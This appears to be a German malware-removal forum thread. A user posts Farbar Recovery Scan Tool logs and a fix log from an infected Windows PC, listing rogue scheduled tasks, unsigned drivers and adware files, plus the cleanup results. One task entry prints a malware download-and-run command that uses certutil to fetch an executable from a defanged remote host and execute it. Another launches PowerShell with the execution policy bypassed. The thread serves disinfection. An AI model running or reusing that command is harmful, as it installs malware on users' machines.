==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [TCP Query User{3BA89802-EE14-46F8-A794-2A739BF5F99A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [UDP Query User{C1155520-3B6F-4E4A-AC89-91381F99D08A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [{40E49BB6-ABF0-47CB-B218-019E701E0804}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AF5FA658-5740-4813-9449-2D931B2F3309}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AFEE751F-FF72-402F-8133-F76B7A82208B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{24513EE5-D297-4D68-85F5-1CCB96F8D2E9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{D46D3F74-B919-457B-8B8B-3F642FECFF77}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{8A83AE2D-91DB-427A-B27C-8C00514F265B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{C08C2554-A723-4AE2-A5FF-7AF5B5B63745}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{94F28652-E20A-47DC-B119-43217FB92837}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
==================== Wiederherstellungspunkte =========================
01-06-2018 00:17:39 Geplanter Prüfpunkt
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (06/01/2018 10:37:17 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 09:30:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: AsusSetup.exe, Version: 2.0.20.2, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0x00000000
Fehleroffset: 0x00000000
ID des fehlerhaften Prozesses: 0x7b0
Startzeit der fehlerhaften Anwendung: 0x01d3f915e0c98213
Pfad der fehlerhaften Anwendung: C:\Windows\MEI\AsusSetup.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 20bf9f77-6509-11e8-bc5e-10c37b6f5940
Error: (05/31/2018 09:30:48 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:28:49 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:18:19 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:06:36 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 02:19:46 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm NOTEPAD.EXE, Version 6.1.7601.18917 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: ca4
Startzeit: 01d3f8d9a23650b5
Endzeit: 497
Anwendungspfad: C:\Windows\system32\NOTEPAD.EXE
Berichts-ID: e4a6dc91-64cc-11e8-9a9a-10c37b6f5940
Error: (05/31/2018 02:04:05 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Systemfehler:
=============
Error: (06/01/2018 10:39:21 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Intel(R) Management and Security Application Local Management Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.
Error: (06/01/2018 09:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 08:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 07:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 06:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 05:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 04:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 03:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
CodeIntegrity:
===================================
Date: 2018-06-01 10:37:35.824
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 09:52:51.030
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-31 21:31:05.188
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-31 16:47:31.273
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-28 16:16:44.753
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-28 15:33:27.596
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-27 11:36:38.184
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-27 10:18:50.505
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 31%
Installierter physikalischer RAM: 8132.21 MB
Verfügbarer physikalischer RAM: 5555.02 MB
Summe virtueller Speicher: 16262.6 MB
Verfügbarer virtueller Speicher: 12726.03 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:931.41 GB) (Free:779.37 GB) NTFS
\\?\Volume{c6be1ac3-efc6-11e7-8a05-806e6f6e6963}\ (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E8A87806)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
|
|
01.06.2018, 09:51
| #17 |
| | trojaner?/virus? FRST war mal wieder zu groß.
__________________ |
|
01.06.2018, 09:56
| #18 |
| | trojaner?/virus? Fixlog
__________________Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:33:19) Run:2
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
C:\Program Files\SystemaRev
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe" [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
CMD: dir "%ProgramFiles%"
CMD: dir "%ProgramFiles(x86)%"
CMD: dir "%ProgramData%"
CMD: dir "%Appdata%"
CMD: dir "%LocalAppdata%"
CMD: dir "%CommonProgramFiles(x86)%"
CMD: dir "%CommonProgramW6432%"
CMD: dir "%UserProfile%"
CMD: dir "C:\"
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
cmd: netsh winsock reset catalog
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state ON
cmd: Bitsadmin /Reset /Allusers
EmptyTemp:
*****************
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"C:\Program Files\SystemaRev" => nicht gefunden
WNetworkMgmt => Dienst nicht gefunden.
"C:\ProgramData\Microsoft\Windows\WNetworkMgmt" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\FairplayKD" => erfolgreich entfernt
FairplayKD => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Synth3dVsc" => erfolgreich entfernt
Synth3dVsc => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\tsusbhub" => erfolgreich entfernt
tsusbhub => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\VGPU" => erfolgreich entfernt
VGPU => Dienst erfolgreich entfernt
Winmon => Dienst nicht gefunden.
WinmonFS => Dienst nicht gefunden.
WinmonProcessMonitor => Dienst nicht gefunden.
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => nicht gefunden
"C:\Windows\System32\drivers\WinmonFS.sys" => nicht gefunden
"C:\Windows\System32\drivers\Winmon.sys" => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
C:\Windows\ntbtlog.txt => erfolgreich verschoben
"C:\ProgramData\SystemaRev" => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
"C:\Windows\Reimage.ini" => nicht gefunden
"C:\Users\Nico\AppData\Roaming\ParetoLogic" => nicht gefunden
"C:\Windows\SysWOW64\SSL" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Windows\qcusolizqbhuglpw.qcus" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
C:\Users\Nico\AppData\Local\installer.dat => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Windows\SysWOW64\findit.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\ProgramData\Logic Cramble" => nicht gefunden
C:\Users\Nico\ntuser.pol => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\FastDataX" => nicht gefunden
"C:\Users\Nico\AppData\Local\XService" => nicht gefunden
C:\Users\Nico\AppData\Local\Package Cache => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\EpicNet Inc" => nicht gefunden
"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
"C:\Windows\system32\Drivers\WinmonProcessMonitor.sys" => nicht gefunden
C:\Windows\System32\Tasks\AncillaryFunctionauf => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\betterworld" => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE} => erfolgreich verschoben
C:\ProgramData\ntuser.pol => erfolgreich verschoben
C:\Windows\System32\Tasks\Social Software => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
"C:\Users\Public\Documents\XMUpdate" => nicht gefunden
"C:\Program Files\Common Files\5ZNAWZD2EL69" => nicht gefunden
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk => erfolgreich verschoben
C:\Users\Nico\AppData\LocalLow\AMD => erfolgreich verschoben
"C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe" => nicht gefunden
C:\Windows\uninstaller.dat => erfolgreich verschoben
